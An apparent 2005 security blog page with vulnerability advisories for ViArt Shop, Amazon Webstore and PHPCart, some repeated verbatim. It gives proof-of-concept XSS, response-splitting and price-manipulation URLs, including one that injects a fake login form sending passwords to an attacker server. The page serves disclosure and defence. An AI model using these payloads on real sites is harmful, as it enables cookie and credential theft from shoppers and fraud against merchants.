#########################################################
ViArt Shop Enterprise multiple variable XSS
vendor: http://www.codetosell.com
advisory:http://lostmon.blogspot.com/2005/04/
viart-shop-enterprise-multiple.html
vendor informed: yes exploit available:yes
OSVDB ID:15951, 15952 ,15953, 15954 , 15955 , 15956 , 15957, 15958
Securitytracker:1013853
Secunia:SA15181
BID:13462
#########################################################
ViArt Shop contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple variables upon submission to the multiple scripts.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust relationship
between the browser and the server,leading to a loss of integrity.
##########
versions:
##########
ViArt Shop Enterprise v.2.1.6 afected
also is posible prior versions are afected too.
##########
Solution:
##########
Update to version ViArt Shop version 2.1.8
#########
timeline:
#########
discovered : 25 april 2005
vendor notify :28 april 2005
vendor response :18-10-2005
vendor fix:05-05-2005
disclosure:29 april 2005
########## Proof of concept ##############
############
basket.php
###########
http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0
[XSS-CODE]%26search_string%3Dss%26search_category_id%3D
http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3D[XSS-CODE]%26search_string%3Dss%26
search_category_id%3D%26search_category_id%3D
http://[victim]/basket.php?rp=products.php%3Fcategory_id
%3D0%26search_string%3Dss%26search_string%3Dss%26
search_category_id[XSS-CODE]%26search_category_id%3D
http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26
search_category_id%3D[XSS-CODE]%26search_category_id%3D
http://[victim]/basket.php?rp=products.php%3Fcategory_id%3D0%26
search_string%3Dss%26search_string%3Dss%26search_category_id%3D
%26search_category_id%3D[XSS-CODE]
###########
forum.php
###########
http://[victim]/forum_new_thread.php
form fields nickname,email,topic and message are vulnerables to XSS
for exploiting email you can use:
[XSS-CODE]@email.com or email@[XSS-CODE].com
http://[victim]/forum_thread.php?thread_id=2
wen reply to a post nickname and message fields are vulnerable to XSS
all of this codes are executed wen a user view the forum or wen admin
look in "admin panel" for "forum threads" in forum menu
###########
page.php
###########
http://[victim]/page.php?page=about%22%3E
%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/page.php?page=%3Cp%3Ean%20eror%20was%20send
%20to%20webmaster,%20please%20insert%20your%20username%20
and%20password%20,%20and%20continue%20shopping%20%3Cform
%20action=%22http://[evil-server]/save.php%22%20method=%22
post%22%3EUsername:%3Cinput%20aame=%22username%22%20type
=%22text%22%20maxlength=%2230%22%3E%3Cbr%3EPassword:%3C
input%20name=%22password%22%20type=%22text%22%20maxlength
=%2230%22%3E%3Cbr%3E%3Cinput%20name=%22login%22%20type=
%22submit%22%20value=%22Login%22%3E%3C/form%3E
############
reviews.php
############
http://[victim]/reviews.php?category_id=0&item_id=4[XSS-CODE]
http://[victim]/reviews.php?category_id=0[XSS-CODE]&item_id=4
http://[victim]/reviews.php?filter=0&item_id=4
[XSS-CODE]&category_id=0
#################
products.php
#################
http://[victim]/product_details.php?item_id=4
&category_id=0[XSS-CODE]
http://[victim]/products.php?category_id=13[XSS-CODE]
http://[victim]/products.php?category_id=0&search_string=
[XSS-CODE]&search_category_id=
##################
news_view.php
##################
http://[victim]/news_view.php?news_id=3&rp=
news.php[XSS-CODE]&page=1
http://[victim]/news_view.php?news_id=3&rp=
news.php&page=1[XSS-CODE]
################# end #########################
thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
Amazon webstore script injection and XSS
Thursday, April 28, 2005
#########################################################
Amazon webstore script injection and XSS
vendor:http://scripts.justwilliams.com/amazon/index.htm
advisory:http://lostmon.blogspot.com/2005/04/
amazon-webstore-script-injection-and.html
vendor informed: yes exploit available:yes
OSVDB ID:15892 , 15893 and 15894
Secunia: SA15155
BID: 13419 , 13425, 13426 , 13427 , 13428
Securitytracker:1013836
#########################################################
Amazon Webstore is a project that is currently being developed
at JustWilliam's. It is written in PHP and is designed to interface
with Amazon's vast database of products
Amazon Webstore contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'image' or 'currentIsExpanded''searchFor'and 'currentNumber'
upon submission to the 'index.php'and 'closeup.php' scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.
##########
versions:
##########
Amazon Webstore Version 04050100
also is posible prior versions are afected.
#########
Solution:
#########
no solution at this time
##########
timeline:
##########
discovered: 25 april 2005
vendor notify: 26 april 2005
vendor response:
vendor fix:
disclosure:28 april 2005
##########
exploits :
##########
http://[victim]/store/uk/product/%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm
and server respose with this cookie :
ourhistory[uk]
a%3A1%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert
%28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7B
s%3A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+
-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
2981060096
29706949
933228160
29706915
*
them if we try to inject a malicious javascript it is execute
everytime what we navigate on a link of the page.
http://[victim]/store/uk/product/">%0d%0aSet-Cookie:%20
HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm
and server respond with cookie:
ourhistory[uk]
a%3A1%3A%7Bs%3A56%3A%22asin-%0D%0ASet-Cookie%3A
+HTTP_response_splitting%3DYES%0D%0AFoo%3A+bar%22%
3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A20%3A%22-+No
+product+found+-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
1656289024
29706956
995487088
29706922
*
if we inject first url and after the second the server set this cookie:
ourhistory[uk]
a%3A3%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert%
28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7Bs%3
A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+-%22%3
Bs%3A1%3A%22i%22%3BN%3B%7Ds%3A15%3A%22asin-B00004UAFX
%22%3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A17%3A%22Story+
Book+Weaver%22%3Bs%3A1%3A%22i%22%3Bs%3A63%3A%22http%3
A%2F%2localhost%2Fimages%2FP%2FB00004UAFX.02.THUMBZZ
localhost/
1536
1656289024
29706956
995487088
29706922
*
######################
XX on others scripts
######################
http://[victim]/closeup.php?image=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E
http://[victim]/index.php?currentIsExpanded=0%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E¤tNumber=8
http://[victim]/index.php?function=search&searchFor=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/uk/list/c/software_CAD_Technical_60002_uk.htm?
currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E¤tIsExpanded=0
http://[victim]/index.php?country=uk
&function=search&searchFor='%20';!--%22%3CCSS_Check%3E=&{()}
&goButton=go&mode=books
is posible to others scripts are vulnerables too
################# End ###################
thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
Amazon webstore script injection and XSS
vendor:http://scripts.justwilliams.com/amazon/index.htm
advisory:http://lostmon.blogspot.com/2005/04/
amazon-webstore-script-injection-and.html
vendor informed: yes exploit available:yes
OSVDB ID:15892 , 15893 and 15894
Secunia: SA15155
BID: 13419 , 13425, 13426 , 13427 , 13428
Securitytracker:1013836
#########################################################
Amazon Webstore is a project that is currently being developed
at JustWilliam's. It is written in PHP and is designed to interface
with Amazon's vast database of products
Amazon Webstore contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'image' or 'currentIsExpanded''searchFor'and 'currentNumber'
upon submission to the 'index.php'and 'closeup.php' scripts.This
could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust
relationship between the browser and the server,leading to a
loss of integrity.
##########
versions:
##########
Amazon Webstore Version 04050100
also is posible prior versions are afected.
#########
Solution:
#########
no solution at this time
##########
timeline:
##########
discovered: 25 april 2005
vendor notify: 26 april 2005
vendor response:
vendor fix:
disclosure:28 april 2005
##########
exploits :
##########
http://[victim]/store/uk/product/%22%3E%3Cscript%3
Ealert(document.cookie)%3C/script%3E.htm
and server respose with this cookie :
ourhistory[uk]
a%3A1%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert
%28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7B
s%3A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+
-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
2981060096
29706949
933228160
29706915
*
them if we try to inject a malicious javascript it is execute
everytime what we navigate on a link of the page.
http://[victim]/store/uk/product/">%0d%0aSet-Cookie:%20
HTTP_response_splitting%3dYES%0d%0aFoo:%20bar.htm
and server respond with cookie:
ourhistory[uk]
a%3A1%3A%7Bs%3A56%3A%22asin-%0D%0ASet-Cookie%3A
+HTTP_response_splitting%3DYES%0D%0AFoo%3A+bar%22%
3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A20%3A%22-+No
+product+found+-%22%3Bs%3A1%3A%22i%22%3BN%3B%7D%7D
localhost/
1536
1656289024
29706956
995487088
29706922
*
if we inject first url and after the second the server set this cookie:
ourhistory[uk]
a%3A3%3A%7Bs%3A47%3A%22asin-%5C%22%3E%3Cscript%3Ealert%
28document.cookie%29%3C%2Fscript%3E%22%3Ba%3A2%3A%7Bs%3
A1%3A%22t%22%3Bs%3A20%3A%22-+No+product+found+-%22%3
Bs%3A1%3A%22i%22%3BN%3B%7Ds%3A15%3A%22asin-B00004UAFX
%22%3Ba%3A2%3A%7Bs%3A1%3A%22t%22%3Bs%3A17%3A%22Story+
Book+Weaver%22%3Bs%3A1%3A%22i%22%3Bs%3A63%3A%22http%3
A%2F%2localhost%2Fimages%2FP%2FB00004UAFX.02.THUMBZZ
localhost/
1536
1656289024
29706956
995487088
29706922
*
######################
XX on others scripts
######################
http://[victim]/closeup.php?image=%22%3E%3Cscript%3E
alert(document.cookie)%3C/script%3E
http://[victim]/index.php?currentIsExpanded=0%22%3E%3Cscript
%3Ealert(document.cookie)%3C/script%3E¤tNumber=8
http://[victim]/index.php?function=search&searchFor=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[victim]/uk/list/c/software_CAD_Technical_60002_uk.htm?
currentNumber=4.3%22%3E%3Cscript%3Ealert(document.cookie)%3
C/script%3E¤tIsExpanded=0
http://[victim]/index.php?country=uk
&function=search&searchFor='%20';!--%22%3CCSS_Check%3E=&{()}
&goButton=go&mode=books
is posible to others scripts are vulnerables too
################# End ###################
thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to icaro he is investigate with me.
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
How safe is shopping on internet
Wednesday, April 27, 2005
In the latest days, they are possible to be read in different sites,
the news on the increase of the Phishing, today I want to raise a
reflection, whichever safe is to buy today in Internet in day?
Diabolic Crab has reported multitude of vulnerabilities in different
systems based on virtual stores, i myself I have reported some of
them,and others "vulns finders" and today considers to me cueston
to where have part of fault vendors or developers of software of
these increases of phishing?
Is trustworthy the content that this seeing or has been manipulated
before arriving at you? the developers of software day to day need a
new figure that is appraised in Internet "aplications to tester"
understood in looking for the new vulnerabilities in new products and
new programming languages...
A simple failure of validation can may to get to be reason for phishing
in its product? is a reality what the user in the purchases by Internet
are trusted when day to day they see themselves and continue seeing
that in if many of mayor products or CMS for e-comerce are not reliable even.
atentamente :
Lostmon (Lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
the news on the increase of the Phishing, today I want to raise a
reflection, whichever safe is to buy today in Internet in day?
Diabolic Crab has reported multitude of vulnerabilities in different
systems based on virtual stores, i myself I have reported some of
them,and others "vulns finders" and today considers to me cueston
to where have part of fault vendors or developers of software of
these increases of phishing?
Is trustworthy the content that this seeing or has been manipulated
before arriving at you? the developers of software day to day need a
new figure that is appraised in Internet "aplications to tester"
understood in looking for the new vulnerabilities in new products and
new programming languages...
A simple failure of validation can may to get to be reason for phishing
in its product? is a reality what the user in the purchases by Internet
are trusted when day to day they see themselves and continue seeing
that in if many of mayor products or CMS for e-comerce are not reliable even.
atentamente :
Lostmon (Lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente.
PHPCart price manipulation
Tuesday, April 26, 2005
###############################################
PHPCart order price manipulation
vendor url: www.phpcart.net
advisory:http://lostmon.blogspot.com/2005/04/
phpcart-price-manipulation.html
vendor notify: yes exploit available: yes
OSVDB ID:15859
BID:13406
Secunia: SA15147
Securitytracker:1013892
################################################
PHPCart is a simple shopping system for small web-merchants
.Set-up of PHPCart is quick and easy, and does not require a database.
PHPcart contains a flaw that allows a price manipulation wen order a
product.This flaw exists because the application does not validate
'price' , 'postage' variables upon submission to the 'phpcart.php'
script. This could allow a user to create a specially crafted URL that
can shop some products at 0$, leading to a loss of integrity.
versions:
3.2 afected
3.3 not tested
also is posible all vesions prior to 3.2 are vulnerables.
##########
solution:
##########
upgrade to version 3.3 (not tested)
this version is not tested and is also posible to be vulnerable too.
##########
timeline
##########
discovered:25 april 2005
vendor notify 26 april 2005
vendor response:
vendor fix:
disclosure:27 april 2005
#####################
Proof of concept:
#####################
for exploiting this issue :
1 click in "add to cart" button on product what you are interested
the link have a similar looks :
http://[victim]/phpcart.php?action=add&id=1002&descr=Mobile%20
Phone&price=35.0&postage=10&quantity=1
if we look we have this variables ==>&price=35.0&postage=10 this is
the price of the product and the post cost.
in your cart you have now a product.
2. click on "view basket" and you have your product ... delete it and
click on this manipulate URL:
http://[victim]/phpcart.php?action=add&id=1002&descr=Mobile%20
Phone&price=0&postage=&quantity=100
we manipulate 'price' , 'postage' and 'quantity' and now if we look our
basket we have 100 products shopping at cost 0$
############### End ####################
thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....
PHPCart order price manipulation
vendor url: www.phpcart.net
advisory:http://lostmon.blogspot.com/2005/04/
phpcart-price-manipulation.html
vendor notify: yes exploit available: yes
OSVDB ID:15859
BID:13406
Secunia: SA15147
Securitytracker:1013892
################################################
PHPCart is a simple shopping system for small web-merchants
.Set-up of PHPCart is quick and easy, and does not require a database.
PHPcart contains a flaw that allows a price manipulation wen order a
product.This flaw exists because the application does not validate
'price' , 'postage' variables upon submission to the 'phpcart.php'
script. This could allow a user to create a specially crafted URL that
can shop some products at 0$, leading to a loss of integrity.
versions:
3.2 afected
3.3 not tested
also is posible all vesions prior to 3.2 are vulnerables.
##########
solution:
##########
upgrade to version 3.3 (not tested)
this version is not tested and is also posible to be vulnerable too.
##########
timeline
##########
discovered:25 april 2005
vendor notify 26 april 2005
vendor response:
vendor fix:
disclosure:27 april 2005
#####################
Proof of concept:
#####################
for exploiting this issue :
1 click in "add to cart" button on product what you are interested
the link have a similar looks :
http://[victim]/phpcart.php?action=add&id=1002&descr=Mobile%20
Phone&price=35.0&postage=10&quantity=1
if we look we have this variables ==>&price=35.0&postage=10 this is
the price of the product and the post cost.
in your cart you have now a product.
2. click on "view basket" and you have your product ... delete it and
click on this manipulate URL:
http://[victim]/phpcart.php?action=add&id=1002&descr=Mobile%20
Phone&price=0&postage=&quantity=100
we manipulate 'price' , 'postage' and 'quantity' and now if we look our
basket we have 100 products shopping at cost 0$
############### End ####################
thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)